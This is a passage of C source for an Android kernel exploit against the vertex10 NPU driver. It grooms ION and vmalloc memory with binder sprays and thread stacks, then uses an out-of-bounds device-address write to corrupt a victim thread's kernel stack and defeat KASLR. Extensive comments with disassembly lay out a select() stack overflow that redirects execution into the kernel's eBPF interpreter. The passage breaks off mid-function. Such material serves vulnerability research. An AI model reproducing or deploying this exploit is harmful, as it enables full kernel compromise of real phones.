				//LOG("ION 0x%08x [%x]; next = 0x%08x  (%u)", daddr, fill_size,
				//		next_daddr, fd_idx);
			}
			// Save this allocation to the array.
			ion_fill_fds.fd[fd_idx] = fill_fd;
			fd_idx++;
			// Update the expected daddr and set retries to 0.
			expected_daddr = next_daddr;
			retry_count = 0;
			// Check if we are close enough that we should now try to allocate the
			// address directly.
			if (expected_daddr + direct_fill_threshold >= target->daddr) {
				break;
			}
		}
		// Try to allocate the target directly by filling right up to it and then
		// allocating the target size.
		for (unsigned try = 0;; try++) {
			if (try > 250) {
				FATAL("Could not allocate ION daddr 0x%08x [%x]", target->daddr,
						target->size);
			}
			// The size of the filling allocation can usually be calculated as the
			// delta between the addresses minus the natural ION padding size. However,
			// for some larger allocation sizes, the ION padding size seems to be
			// doubled. No idea why, this is just observational.
			uint32_t padding = (target->size > 2 * ion_padding ? 2 : 1) * ion_padding;
			uint32_t fill_size = target->daddr - expected_daddr - padding;
			// Try the allocations. It seems to actually be important to read the
			// filler's daddr for some reason.
			int fill_fd = ion_alloc(ion_fd, fill_size, ion_heap);
			int target_fd = ion_alloc(ion_fd, target->size, ion_heap);
			uint32_t fill_daddr = vertex10_get_ion_daddr(fill_fd, NULL, fill_size);
			uint32_t target_daddr = vertex10_get_ion_daddr(target_fd, NULL, target->size);
			// Check if we hit the target.
			if (target_daddr == target->daddr) {
				// We hit! It's important not to deallocate either of these fds.
				ion_fill_fds.fd[fd_idx] = fill_fd;
				fd_idx++;
				target->fd = target_fd;
				LOG("ION TARGET  0x%08x [%x] -> 0x%08x [%x]  fd=%d",
						fill_daddr, fill_size, target_daddr, target->size,
						target_fd);
				break;
			}
			// Miss! Close the fds and retry.
			close(target_fd);
			close(fill_fd);
			//LOG("  MISS  0x%08x [%x] -> 0x%08x [%x] != 0x%08x", fill_daddr, fill_size,
			//		target_daddr, target->size, target->daddr);
		}
	}
	// Deallocate all the intermediate (filler) ION buffers.
	destroy_fd_array(ion_fill_fds, (void (*)(int)) close);
	int ion1_fd = target_ion_alloc[0].fd;
	int ion2_fd = target_ion_alloc[1].fd;
	// When the ION buffers are mapped into the kernel vmalloc area, they will be sandwiched
	// between two thread kernel stack sprays, and thus will be subject to the alignment of
	// these stacks. We can calculate the alignment between the ION mappings and the thread
	// stacks as follows:
	//
	// 	stack    guard      ION1      guard      ION2      guard      align      stack
	// 	0x4000 + 0x1000 + ion1_size + 0x1000 + ion2_size + 0x1000 + ion_align == 0 mod 0x8000
	//
	// However, when allocating large ION regions, it seems that there's an additional 0x8000
	// page allocation that occurs before the actual ION buffer, so we'll need to include that
	// (plus its guard page) in the ION size when calculating the alignment.
	size_t ion1_to_ion2 = 0x1000 + 0x8000 + 0x1000;
	size_t ion_rsize = ION1_SIZE + ion1_to_ion2 + ION2_SIZE + 0x1000;
	size_t ion_align = (0x8000 - 0x4000 - 0x1000 - (ion_rsize % 0x8000)) % 0x8000;
	// Finally, map the ION buffers in userspace and configure them to write at offset 0x800
	// (in-bounds).
	void *ion1_map = ion_mmap(ion1_fd, ION1_SIZE);
	void *ion2_map = ion_mmap(ion2_fd, ION2_SIZE);
	vertex10_set_daddr_write_offset(ion1_map, 0x800);
	vertex10_set_daddr_write_offset(ion2_map, 0x800);

	VMALLOC_CHECKPOINT(2);

	// 3. Create a large number of file descriptors for /dev/binder. Each one allows us to
	// perform one kernel vmalloc() of size at most 4 MiB.
	struct fd_array binder_fds = create_fd_array(8192, binder_open);

	// 4. Open the NPU device, /dev/vertex10, once for each ION buffer.
	int ncp1_fd = vertex10_open();
	int ncp2_fd = vertex10_open();

	// 5. Force a purge of "unpurged vm_area" vmalloc entries by spraying binder vmalloc()s.
	const size_t purge_size = 0x400000; // 4 MiB
	const size_t purge_count = 32uLL * 1024 * 1024 * 8 * 2 / purge_size; // 32 MiB * 8 cores * 2
	struct fd_array purge_fds = pop_fds(&binder_fds, purge_count);
	void **purge_map = malloc(purge_count * sizeof(*purge_map));
	for (size_t i = 0; i < purge_count; i++) {
		purge_map[i] = binder_mmap(purge_fds.fd[i], purge_size);
	}
	for (size_t i = 0; i < purge_count; i++) {
		munmap(purge_map[i], purge_size);
	}
	free(purge_map);
	destroy_fd_array(purge_fds, (void (*)(int)) close);

	// 6. Allocate a pattern of binder vmalloc()s to fill any holes in the vmalloc heap down
	// through size 0x5000 (0x4000 plus 0x1000 guard page).
	const struct {
		uint32_t size;
		uint32_t count;
	} vmalloc_pattern[] = {
		{  0x400000,  192 },
		{  0x200000,  128 },
		{  0x100000,  128 },
		{   0x80000,  128 },
		{   0x40000,  128 },
		{   0x20000,  192 },
		{   0x10000,  192 },
		{    0x8000,  256 },
		{    0x4000, 2000 },
	};
	const size_t vmalloc_classes = sizeof(vmalloc_pattern) / sizeof(vmalloc_pattern[0]);
	size_t vmalloc_count = 0;
	for (size_t class = 0; class < vmalloc_classes; class++) {
		vmalloc_count += vmalloc_pattern[class].count;
	}
	struct fd_array vmalloc_fds = pop_fds(&binder_fds, vmalloc_count);
	void **vmalloc_maps = malloc(vmalloc_count * sizeof(*vmalloc_maps));
	size_t vmalloc_idx = 0;
	for (size_t class = 0; class < vmalloc_classes; class++) {
		for (size_t alloc = 0; alloc < vmalloc_pattern[class].count; alloc++) {
			int fd = vmalloc_fds.fd[vmalloc_idx];
			vmalloc_maps[vmalloc_idx] = binder_mmap(fd, vmalloc_pattern[class].size);
			vmalloc_idx++;
		}
	}
	assert(vmalloc_idx <= vmalloc_count);

	VMALLOC_CHECKPOINT(3);

	// 7. Allocate thread kernel stacks for the before threads.
	static const size_t BEFORE_THREAD_COUNT = 2000;
	static const size_t AFTER_THREAD_COUNT  = 1000;
	LOG("Allocating threads");
	pthread_t *pthreads = malloc(BEFORE_THREAD_COUNT + AFTER_THREAD_COUNT);
	pthread_t *before_pthreads = &pthreads[0];
	pthread_t *after_pthreads = &pthreads[BEFORE_THREAD_COUNT];
	thread_count = 0;
	for (size_t i = 0; i < BEFORE_THREAD_COUNT; i++) {
		int ret = pthread_create(&before_pthreads[i], NULL, victim_thread_func, NULL);
		if (ret != 0) {
			perror("pthread_create");
			FATAL("Could not create before thread");
		}
	}
	while (thread_count < BEFORE_THREAD_COUNT) {
		usleep(10 * 1000);
	}

	VMALLOC_CHECKPOINT(4);

	// 8. Map the ION buffers in the kernel, small buffer first. Note that having multiple
	// calls to the VS4L_VERTEXIOC_S_GRAPH ioctl() makes our ION buffer unable to be remapped a
	// second time (leak?), so don't expect to be able to run the exploit multiple times.
	vertex10_add_daddr(ncp1_fd, ion1_fd, ION1_SIZE);
	vertex10_add_daddr(ncp2_fd, ion2_fd, ION2_SIZE);

	// 9. Allocate kernel thread stacks for the after threads.
	for (size_t i = 0; i < AFTER_THREAD_COUNT; i++) {
		int ret = pthread_create(&after_pthreads[i], NULL, victim_thread_func, NULL);
		if (ret != 0) {
			perror("pthread_create");
			FATAL("Could not create after thread");
		}
	}
	while (thread_count < BEFORE_THREAD_COUNT + AFTER_THREAD_COUNT) {
		usleep(10 * 1000);
	}
	LOG("Done allocating threads");

	VMALLOC_CHECKPOINT(5);

	// 10. See victim_thread_func().

	// 11. Check that the daddrs of the ION buffers (written when we called
	// VS4L_VERTEXIOC_S_GRAPH) match what we expect.
	uint32_t ion1_daddr_chk = *(uint32_t *) ((uintptr_t) ion1_map + 0x800);
	uint32_t ion2_daddr_chk = *(uint32_t *) ((uintptr_t) ion2_map + 0x800);
	if (ion1_daddr_chk != ION1_DADDR) {
		FATAL("ION 1 daddr changed! 0x%x != 0x%x", ion1_daddr_chk, ION1_DADDR);
	}
	if (ion2_daddr_chk != ION2_DADDR) {
		FATAL("ION 2 daddr changed! 0x%x != 0x%x", ion2_daddr_chk, ION2_DADDR);
	}

	// 12. Write to the target register in the victim thread's stack using ION buffer 2 (the
	// large one) in order to identify which of our many threads is the victim thread. Sleep a
	// little to allow all threads to enter the blocking pselect6() syscall.
	LOG("Writing to victim thread's kernel stack");
	usleep(100 * 1000);
	size_t stack_skip = 40 * 0x8000;
	const size_t ion2_to_kernel_stack = ION2_SIZE + 0x1000 + ion_align + stack_skip + 0x4000;
	const size_t ion1_to_kernel_stack = ION1_SIZE + ion1_to_ion2 + ion2_to_kernel_stack;
	ssize_t test_register_offset = - 0x140 + 8 * VICTIM_TEST_REGISTER;
	vertex10_set_daddr_write_offset(ion2_map, ion2_to_kernel_stack + test_register_offset);
	vertex10_add_daddr(ncp2_fd, ion2_fd, ION2_SIZE);

	// 13. Unblock the pipe to have the threads return from pselect6(). Wait for one to report
	// to us that it is the victim.
	write(zero_pipe[1], "a", 1);
	while (victim_tid == 0) {
		usleep(10 * 1000);
		if (thread_count == 0) {
			FATAL("No victim thread! Kernel vmalloc groom failed!");
		}
	}
	LOG("Found victim thread %d", victim_tid);
	// Now that the thread has been found, clear the pipe.
	char clear_buf[1];
	read(zero_pipe[0], clear_buf, 1);

	// 14. See victim_thread_func().

	// 15. Now that we've established a stable add primitive over the victim thread's kernel
	// stack, we don't need the other kernel sprays. All non-victim threads exited in 14.
	vmalloc_idx = 0;
	for (size_t class = 0; class < vmalloc_classes; class++) {
		for (size_t alloc = 0; alloc < vmalloc_pattern[class].count; alloc++) {
			munmap(vmalloc_maps[vmalloc_idx], vmalloc_pattern[class].size);
			vmalloc_idx++;
		}
	}
	free(vmalloc_maps);
	destroy_fd_array(binder_fds, (void (*)(int)) close);

	// 16. See victim_thread_func().

	// 17. Wait for the victim thread to block in pselect6() in the kernel, and then use the
	// stack write primitive to overwrite the least significant byte of spilled X22 with the
	// most significant byte of the ION 2 daddr. (This corrupts saved X23, but that register is
	// unused.)
	//
	// el0_sync_64:
	// 	FFFFFF8008081C08         SUB             SP, SP, #0x140	; -0x140
	// 	...
	// 	FFFFFF800808346C         BLR             X16
	//
	// SyS_pselect6:
	// 	FFFFFF800828A7A0         SUB             SP, SP, #0xA0	; -0x1e0
	// 	...
	// 	FFFFFF800828AA60         BL              core_sys_select
	//
	// core_sys_select:
	// 	FFFFFF8008289B8C         SUB             SP, SP, #0x1C0	; -0x3a0
	// 	...
	// 	FFFFFF8008289E44         BL              do_select
	// 	...
	// 	FFFFFF8008289E80         MOV             X2, size@X22
	// 	FFFFFF8008289E90         BL              __arch_copy_to_user
	//
	// do_select:
	// 	FFFFFF8008289FBC         STP             X28, X27, [SP,#-0x60]! ; -0x60
	// 	FFFFFF8008289FC0         STP             X26, X25, [SP,#0x10]
	// 	FFFFFF8008289FC4         STP             X24, X23, [SP,#0x20]
	// 	FFFFFF8008289FC8         STP             X22, X21, [SP,#0x30]   ; +0x30
	// 	FFFFFF8008289FCC         STP             X20, X19, [SP,#0x40]
	// 	FFFFFF8008289FD0         STP             X29, X30, [SP,#0x50]
	// 	FFFFFF8008289FD4         ADD             X29, SP, #0x50
	// 	FFFFFF8008289FD8         SUB             SP, SP, #0x340
	const ssize_t saved_size_offset = - 0x140 - 0xA0 - 0x1C0 - 0x60 + 0x30 - 3;
	usleep(10 * 1000);
	vertex10_set_daddr_write_offset(ion2_map, ion2_to_kernel_stack + saved_size_offset);
	vertex10_add_daddr(ncp2_fd, ion2_fd, ION2_SIZE);

	// 18. See victim_thread_func().

	// 19. Wait for the victim thread to compute the kernel stack address. Once it does so, it
	// we will also have the kernel slide. We will use the stack address to locate ION buffer
	// 2.
	while (victim_stack == 0) {
		usleep(10 * 1000);
	}
	const uint64_t ion2_address = victim_stack - ion2_to_kernel_stack;
	LOG("Victim stack 0x%lx", victim_stack);
	LOG("ION buffer address 0x%lx", ion2_address);

	// At this point we know the victim stack's address and we've defeated KASLR. The next step
	// is to get kernel code execution. We'll be targeting pselect6() once again to overwrite
	// the return address of core_sys_select() from do_select().
	//
	// Here are the relevant parts of the body of do_select():
	//
	// 	static int do_select(int n, fd_set_bits *fds, struct timespec64 *end_time)
	// 	{
	// 	...
	// 	    retval = 0;
	// 	    for (;;) {
	// 	...
	// 	        inp = fds->in; outp = fds->out; exp = fds->ex;
	// 	        rinp = fds->res_in; routp = fds->res_out; rexp = fds->res_ex;
	//
	// 	        for (i = 0; i < n; ++rinp, ++routp, ++rexp) {
	// 	...
	// 	            in = *inp++; out = *outp++; ex = *exp++;
	// 	            all_bits = in | out | ex;
	// 	            if (all_bits == 0) {
	// 	                i += BITS_PER_LONG;
	// 	                continue;
	// 	            }
	//
	// 	            for (j = 0, bit = 1; j < BITS_PER_LONG; ++j, ++i, bit <<= 1) {
	// 	                struct fd f;
	// 	                if (i >= n)
	// 	                    break;
	// 	                if (!(bit & all_bits))
	// 	                    continue;
	// 	                f = fdget(i);
	// 	                if (f.file) {
	// 	...
	// 	                    if (f_op->poll) {
	// 	...
	// 	                        mask = (*f_op->poll)(f.file, wait);
	// 	                    }
	// 	                    fdput(f);
	// 	                    if ((mask & POLLIN_SET) && (in & bit)) {
	// 	                        res_in |= bit;
	// 	                        retval++;
	// 	...
	// 	                    }
	// 	...
	// 	                }
	// 	            }
	// 	            if (res_in)
	// 	                *rinp = res_in;
	// 	            if (res_out)
	// 	                *routp = res_out;
	// 	            if (res_ex)
	// 	                *rexp = res_ex;
	// 	            cond_resched();
	// 	        }
	// 	...
	// 	        if (retval || timed_out || signal_pending(current))
	// 	            break;
	// 	...
	// 	        if (!poll_schedule_timeout(&table, TASK_INTERRUPTIBLE,
	// 	                       to, slack))
	// 	            timed_out = 1;
	// 	    }
	// 	...
	// 	    return retval;
	// 	}
	//
	// The key observation is that when do_select() blocks in poll_schedule_timeout(), the
	// value of n (the number of fds to process) will be saved to the stack, and hence can be
	// manipulated using our addition primitive. Then, when poll_schedule_timeout() resumes,
	// we'll re-enter the loop with a value of n larger than the size of our stack buffers,
	// leading to a stack buffer overflow. We'll discuss controlling the contents of this
	// overflow later; first we'll focus on how to trigger it.
	//
	// First and foremost, we need to choose an initial value of n that will cause
	// core_sys_select() to use the stack-based fds buffer rather than a dynamically allocated
	// buffer. This means we need n between 0 and 0x140; for reasons that will become clear
	// later, we will use n = 0x140.
	//
	// The value of n will be saved to the stack when do_select() blocks in
	// poll_schedule_timeout(). At this point, n is stored in register W27, but X27 doesn't get
	// spilled to the stack all the way until the prologue of __schedule():
	//
	// el0_sync_64:
	// 	FFFFFF8008081C08         SUB             SP, SP, #0x140	; -0x140
	// 	...
	// 	FFFFFF800808346C         BLR             X16
	//
	// SyS_pselect6:
	// 	FFFFFF800828A7A0         SUB             SP, SP, #0xA0	; -0x1e0
	// 	...
	// 	FFFFFF800828AA60         BL              core_sys_select
	//
	// core_sys_select:
	// 	FFFFFF8008289B8C         SUB             SP, SP, #0x1C0	; -0x3a0
	// 	...
	// 	FFFFFF8008289E44         BL              do_select
	//
	// do_select:
	// 	FFFFFF8008289FBC         STP             X28, X27, [SP,#-0x60]!	; -0x400
	// 	...
	// 	FFFFFF8008289FD8         SUB             SP, SP, #0x340	; -0x740
	// 	...
	// 	FFFFFF800828A244         BL              poll_schedule_timeout
	//
	// poll_schedule_timeout:
	// 	FFFFFF8008289A50         SUB             SP, SP, #0x30	; -0x770
	// 	FFFFFF8008289A54         STP             X20, X19, [SP,#0x20+var_10]
	// 	FFFFFF8008289A58         STP             X29, X30, [SP,#0x20+var_s0]
	// 	...
	// 	FFFFFF8008289ABC         BL              schedule_hrtimeout_range
	//
	// schedule_hrtimeout_range:
	// 	FFFFFF80090D2F28         STP             X29, X30, [SP,#-0x10+var_s0]!	; -0x780
	// 	...
	// 	FFFFFF80090D2F34         BL              schedule_hrtimeout_range_clock
	//
	// schedule_hrtimeout_range_clock:
	// 	FFFFFF80090D2E04         SUB             SP, SP, #0x80	; -0x800
	// 	FFFFFF80090D2E08         STR             X21, [SP,#0x70+var_20]
	// 	FFFFFF80090D2E0C         STP             X20, X19, [SP,#0x70+var_10]
	// 	FFFFFF80090D2E10         STP             X29, X30, [SP,#0x70+var_s0]
	// 	...
	// 	FFFFFF80090D2E98         BL              schedule
	//
	// schedule:
	// 	FFFFFF80090CF59C         STR             X19, [SP,#-0x10+var_10]!	; -0x820
	// 	FFFFFF80090CF5A0         STP             X29, X30, [SP,#0x10+var_s0]
	// 	...
	// 	FFFFFF80090CF608         BL              __schedule
	//
	// __schedule:
	// 	FFFFFF80090CEC28         SUB             SP, SP, #0x80	; -0x8a0
	// 	FFFFFF80090CEC2C         STP             X28, X27, [SP,#0x70+var_50]	; +0x70-0x50+8
	// 	FFFFFF80090CEC30         STP             X26, X25, [SP,#0x70+var_40]
	// 	FFFFFF80090CEC34         STP             X24, X23, [SP,#0x70+var_30]
	// 	FFFFFF80090CEC38         STP             X22, X21, [SP,#0x70+var_20]
	// 	FFFFFF80090CEC3C         STP             X20, X19, [SP,#0x70+var_10]
	// 	FFFFFF80090CEC40         STP             X29, X30, [SP,#0x70+var_s0]
	//
	// Based on this assembly, we can construct the stack frames to see at what offset the
	// register X27 from do_select() gets spilled to the stack.
	//
	// 	-8a0->+---------+
	// 	      |         | __schedule()
	// 	      |   X28   |
	// 	@-878 |   X27   | <-- n = 40 01 00 00 00 00 00 00
	// 	      |   X26   |
	// 	      |   X25   |
	// 	      |   X24   |
	// 	      |   X23   |
	// 	      |   X22   |
	// 	      |   X21   |
	// 	      |   x20   |
	// 	      |   x19   |
	// 	      |   X29   |
	// 	      |   X30   |
	// 	-820->+---------+
	// 	      |         | schedule()
	// 	-800->+---------+
	// 	      |         | schedule_hrtimeout_range_clock()
	// 	-780->+---------+
	// 	      |         | schedule_hrtimeout_range()
	// 	-770->+---------+
	// 	      |         | poll_schedule_timeout()
	// 	-740->+---------+
	// 	      |         | do_select()
	// 	-3a0->+---------+
	// 	      |         | core_sys_select()
	// 	-1e0->+---------+
	// 	      |         | SyS_pselect6()
	// 	-140->+---------+
	// 	      |         | el0_sync_64
	// 	  -0->+---------+
	//
	const ssize_t saved_n_offset = - 0x140 - 0xA0 - 0x1C0 - 0x60 - 0x340 - 0x30 - 0x10
		- 0x80 - 0x20 - 0x80 + 0x70 - 0x50 + 8;
	assert(saved_n_offset == -0x878);
	//
	// So, we want to target offset -0x878 in the kernel stack, bumping the value there from
	// 0x140 to 0x1140 (as a 32-bit int). Based on how we chose the 2 ION buffer device
	// addresses, we can do this with a sequence of additions as follows:
	//
	// 	                    n | 40 01 00 00  00 00 00 00 | 0x00000140 < 0x8000
	// 	 +     ION 1 (0x8000) | 00 10 80 81              | offset 0
	// 	----------------------+--------------------------+
	// 	         intermediate | 40 11 80 81  00 00 00 00 | 0x00818011 < 0x01000000
	// 	 + ION 2 (0x01000000) |    00 80 7e  82          | offset +1
	// 	----------------------+--------------------------+
	// 	                        40 11 00 00  83          = 0x83'00001140
	//
	// Thus, we can perform the following sequence of ION out-of-bound additions:
	//
	// 	1. Write ION 1's daddr at offset -0x878+0 from the end of the kernel stack.
	// 	2. Write ION 2's daddr at offset -0x878+1 from the end of the kernel stack.
	//
	// As do_select() performs the OOB write, we need to avoid corrupting the user state's
	// saved values of SP, PC, and especially CPSR (PSTATE), not to mention avoid running off
	// the end of the kernel stack entirely. This restriction places an upper bound on the
	// corrupted value of n based on the stack depth of stack_fds. The stack_fds buffer is at
	// offset -0x348, and so to avoid unwanted corruption we must stop processing at inp offset
	// -0x110, which means we can process at most 0x238 bytes, or 0x11c0 file descriptors. This
	// is the reasoning behind the choice of 0x1140. (This analysis is conservative but
	// sufficient.)
	//
	// 	      :    :    :                          :     :
	// 	-140->+---------+                          |  S  |<- inp  (-110)
	// 	      |   X0    |                          |  T  |
	// 	      |   X1    |                          |  A  |<- outp  (-e8)
	// 	      :    :    :                          |  C  |
	// 	      |   X30   |                          |  K  |<- exp   (-c0)
	// 	 -48->+---------+ <-- Must not corrupt     |     |
	// 	      |   SP    |     after this point     |  S  |<- rinp  (-98)
	// 	      |   PC    |     (max rexp value)     |  T  |
	// 	      | PSTATE  |                          |  A  |<- routp (-70)
	// 	 -30->+---------+                          |  C  |
	// 	      :    :    :                          |  K  |<- rexp  (-48)
	// 	  -0->+---------+                          +-----+
	//
	// Also, it's important to note that as the writes progress down the stack, the snake will
	// start to consume its own tail: the value of inp will eventually cross data written by
	// rinp. This introduces a cycle in the values we can output. Using the maximal initial
	// value of n = 0x140, the delta between each of inp, outp, exp, rinp, routp, rexp is 5
	// longs, or 0x28 bytes. Once inp advances 3 * 0x28 = 0x78 bytes, it is reading the value
	// written by rinp 0x78 * 8 = 0x3c0 file descriptors ago. And if the value written to rinp
	// 0x3c0 fds ago was a 0 bit, then the semantics of select() dictate that we are not
	// selecting on the current fd once inp reaches that 0 bit, and hence the value written at
	// the current rinp (0x78 bytes after inp) will also be 0. In other words, once we've
	// written a 0 bit, the bit 0x78 bytes after it will also be forced to 0, and so on for
	// subsequent cycles.
	//
	// It's also worth noting that if you look back at do_select(), you'll observe that rinp is
	// only written if the value to write is nonzero. Thus, if any 64-bit output value is 0,
	// then the corresponding stack location will be left intact.
	//
	// 	in        out       ex        rin       rout      rex
	// 	|---------|--Y------|---------|---------|--X------|---------|---|
	// 	             ^ <------ 0x3c0 bits -------> ^
	//
	// 	To set bit X to 1, we need to ensure that bit Y (0x3c0 bits before X) is also 1.
	// 	If Y is 0, then X will also be 0, unless every other bit in Y's long is also 0, in
	// 	which case X is unchanged.
	//
	// Thus, we we can treat this primitive as the ability to write up to 15 controlled 64-bit
	// values into the stack, each at a unique offset mod 0x78, while leaving stack values at
	// the remaining offsets mod 0x78 intact. (This is again conservative: the primitive is
	// more flexible, but we don't need the added flexibility.)
	//
	// So, how will we control the data that gets written? We only care about rin, as rout and
	// rex will eventually get overwritten by rin, and if the fds we select on are never
	// writable or have extra data, then routp and rexp will never be written to anyway.
	//
	// We can describe the out-of-bound write as 15 (offset, value) pairs, where offset is the
	// offset from the start of the stack_fds array in bytes (which must be a multiple of 8 and
	// must be unique mod 0x78) and value is the 64-bit value to be written at that offset. For
	// each (offset, value) pair, we need to set to 1 every bit in each "pre-image" of value
	// from an earlier cycle.
	//
	// 	in        out       ex        rin       rout      rex
	// 	|---------|-YY------|---------|---------|-XX------|---------|---|
	// 	            ^                             ^
	// 	            inp <----- 0x3c0 bits ------> rinp
	//
	// 	To write 64-bit value XX at rinp, YY an inp (0x3c0 bits earlier) must have all the
	// 	bits in XX set. For example, YY = XX and YY = ~0 are both solutions.
	//
	// For simplicity, let's regard the concatenation of the input fdsets in, out, and ex as a
	// single fdset, just as it appears on the kernel stack in the stack_fds buffer.
	//
	// The simplest solution is to have the "pre-image" of each value be the value itself, such
	// that for each (offset, value) pair,
	//
	// 	*(u64*)input_fdset[offset % 0x78] = value
	//
	// That is, the input buffer simply consists of each of the 15 64-bit values that will be
	// written at their corresponding offsets mod 0x78. Then, to conduct the write, simply make
	// each fd from 0 to 0x1140 be readable. This will mirror the entire 0x78-byte input buffer
	// down the stack in each cycle (except for any holes implied by a 64-bit all-zero value).
	//
	// Using a slightly more complicated solution, however, we can limit the stack corruption.
	// Instead, we'll have the pre-image of each value be ~0 (i.e., all 64 bits set), and use
	// the readability of each file descriptor to control the bits that get written. That way,
	// once we've written the value at the correct offset, the fds corresponding to subsequent
	// cycles can be made non-readable, thereby preventing the corruption from continuing down
	// the stack past the desired depth of each write.
	//
	// This still leaves one more question about the mechanics of the stack buffer overflow:
	// poll_schedule_timeout() will return as soon as any file descriptor becomes readable, so
	// how can we make sure that all the fds for all the 1 bits become readable at the same
	// time? This also has an easy solution: create 2 pipes, one for all 0 bits and one for all
	// 1 bits, and use dup2() to make all the fds we'll be selecting on be duplicates of the
	// read ends of these pipes. Writing data to the "1 bits" pipe will cause
	// poll_schedule_timeout() to return and all the "1 bits" fds will be readable (since
	// they're all the same underlying file). The only thing we need to be careful about is to
	// ensure that one of the original "in" file descriptors (fds 0-0x13f) is a "1 bit" dup, or
	// else poll_schedule_timeout() won't notice the status change on the non-selected fds to
	// unblock.
	//
	// Finally, now that we know the mechanics and constraints of what we're going to write,
	// it's time to consider what data we'll write in our stack buffer overflow. Here's the
	// epilogue of core_sys_select():
	//
	// 	FFFFFF8008289F58         ADRP            X9, #__stack_chk_guard@PAGE
	// 	FFFFFF8008289F5C         LDUR            X8, [X29,#stack_guard]
	// 	FFFFFF8008289F60         LDR             X9, [X9,#__stack_chk_guard@PAGEOFF]
	// 	FFFFFF8008289F64         CMP             X9, X8
	// 	FFFFFF8008289F68         B.NE            loc_FFFFFF8008289FB4
	// 	FFFFFF8008289F6C         MOV             W0, W23
	// 	FFFFFF8008289F70         LDP             X29, X30, [SP,#0x1B0+x29]
	// 	FFFFFF8008289F74         LDP             X20, X19, [SP,#0x1B0+x20]
	// 	FFFFFF8008289F78         LDP             X22, outp, [SP,#0x1B0+x22]
	// 	FFFFFF8008289F7C         LDP             X24, ret, [SP,#0x1B0+x24]
	// 	FFFFFF8008289F80         LDP             X26, X25, [SP,#0x1B0+x26]
	// 	FFFFFF8008289F84         LDP             X28, X27, [SP,#0x1B0+x28]
	// 	FFFFFF8008289F88         ADD             SP, SP, #0x1C0
	// 	FFFFFF8008289F8C         RET
	//
	// At the bare minimum we need to control the stack guard (offset +0x100 from stack_fds, or
	// 10 mod 0x78) and saved return address (70 mod 0x78); the modular offsets don't collide,
	// so it's possible to control both of these values. Ideally we'd hijack the return address
	// to perform a function call with controlled arguments. Thus, the first gadget we'll want
	// to call is something to give us control of an argument register, such as this one from
	// current_time():
	//
	// 	FFFFFF8008294C20         LDP             X29, X30, [SP,#0x10+var_s0]
	// 	FFFFFF8008294C24         MOV             X0, X19
	// 	FFFFFF8008294C28         MOV             X1, X20
	// 	FFFFFF8008294C2C         LDP             X20, X19, [SP+0x10+var_10],#0x20
	// 	FFFFFF8008294C30         RET
	//
	// The argument registers are populated from the just-loaded X19 (60) and X20 (58), both
	// compatible.
	//
	// So, what function should we call? Jann Horn (@tehjh) suggested ___bpf_prog_run() as the
	// ultimate exploitation gadget. If we can control the value of register X1 passed to any
	// of its wrappers (e.g. __bpf_prog_run32()), then we can get it to execute a sequence of
	// eBPF instructions that allow us to perform arbitrary computation and call kernel
	// functions!
	//
	// So, the stack will look like this:
	//
	// 	              _________________
	// 	-2d0 /  +78   |      rin      |    (1, 0)
	// 	              |               |    (1, 8)
	// 	              |               |    (1,10)  [GUARD]
	// 	              |               |    (1,18)  [__bpf_prog_run32]
	// 	              |_______________|    (1,20)
	// 	-2a8 /  +a0   |     rout      |    (1,28)
	// 	              |               |    (1,30)
	// 	              |               |    (1,38)
	// 	              |               |    (1,40)
	// 	              |_______________|    (1,48)
	// 	-280 /  +c8   |      rex      |    (1,50)
	// 	              |               |    (1,58)  [X1]
	// 	              |               |    (1,60)
	// 	              |               |    (1,68)
	// 	              |_______________|    (1,70)  [GADGET_LOAD_X1]
	// 	-258 /  +f0   |    padding    |    (2, 0)
	// 	              |_______________|    (2, 8)
	// 	-248 / +100   |_____guard_____|    (2,10)  GUARD
	// 	              |______X28______|    (2,18)  [__bpf_prog_run32]
	// 	-238 / +110   |______X27______|    (2,20)
	// 	              |______X26______|    (2,28)
	// 	-228 / +120   |______X25______|    (2,30)
	// 	              |______X24______|    (2,38)
	// 	-218 / +130   |______X23______|    (2,40)
	// 	              |______X22______|    (2,48)
	// 	-208 / +140   |______X21______|    (2,50)
	// 	              |______X20______|    (2,58)  X1
	// 	-1f8 / +150   |______X19______|    (2,60)
	// 	              |______X29______|    (2,68)
	// 	-1e8 / +160 __|______X30______|__  (2,70)  GADGET_LOAD_X1
	// 	              |______X20______|    (3, 0)
	// 	-1d8 / +170   |______X19______|    (3, 8)
	// 	              |______X29______| XX (3,10)  [GUARD]
	// 	-1c8 / +180 __|______X30______|__  (3,18)  __bpf_prog_run32
	// 	              |      ...      |

	// 20. Compute the parameters for the stack buffer overflow and generate the overflow
	// contents.
	const uint32_t n = 0x140;
	const unsigned longs = n / 64;	// 5
	const unsigned input_longs = 3 * longs;	// 15
	const unsigned cycle_length = input_longs;	// 15
	const unsigned cycle_size = cycle_length * sizeof(uint64_t);	// 0x78
	assert(corrupted_n == 0x1140);	// n + ION1_DADDR + (ION2_DADDR << 8)
	const unsigned output_longs = (corrupted_n + 63) / 64;
	const unsigned overflow_longs = input_longs + output_longs; // in0->rin0 + rin0->rin
	const unsigned overflow_size = overflow_longs * sizeof(uint64_t);
	const uint64_t bpf_insn_address = ion2_address + 0x2000;
	struct bpf_insn *const bpf_insn = (struct bpf_insn *) ((uintptr_t) ion2_map + 0x2000);
	const uint64_t bpf_data_address = bpf_insn_address + 0x2000;
	uint8_t *const bpf_data = (uint8_t *) ((uintptr_t) bpf_insn + 0x2000);
	const struct {
		uint32_t offset; uint64_t value;
	} stack_write[cycle_length] = {
		/* in:   0 */ { 0x000, 0 },	// Empty in case of ANDROID_APP.
		/* in:   8 */ { 0x080, 1 },	// Force some "in" fd to one_pipe[0].
		/* in:  10 */ { 0x100, 0 },	// GUARD
		/* in:  18 */ { 0x180, __bpf_prog_run32 + kernel_slide },
		/* in:  20 */ { 0x020, 0 },
		/* out: 28 */ { 0x028, 0 },
		/* out: 30 */ { 0x030, 0 },
		/* out: 38 */ { 0x038, 0 },
		/* out: 40 */ { 0x040, 0 },
		/* out: 48 */ { 0x048, 0 },
		/* ex:  50 */ { 0x050, 0 },
		/* ex:  58 */ { 0x148, bpf_insn_address },	// X1 = insn
		/* ex:  60 */ { 0x060, 0 },
		/* ex:  68 */ { 0x068, 0 },
		/* ex:  70 */ { 0x160, GADGET_LOAD_X1 + kernel_slide },
	};
	// Reconstruct the exact contents of the stack_fds buffer after the overflow. The first
	// 0x78 bytes are the concatenated initial input buffers in, out, and ex.
	uint8_t stack_fds[overflow_size] = {};
	for (unsigned i = 0; i < sizeof(stack_write) / sizeof(stack_write[0]); i++) {
		uint64_t value = stack_write[i].value;
		if (value != 0) {
			int32_t offset = stack_write[i].offset;
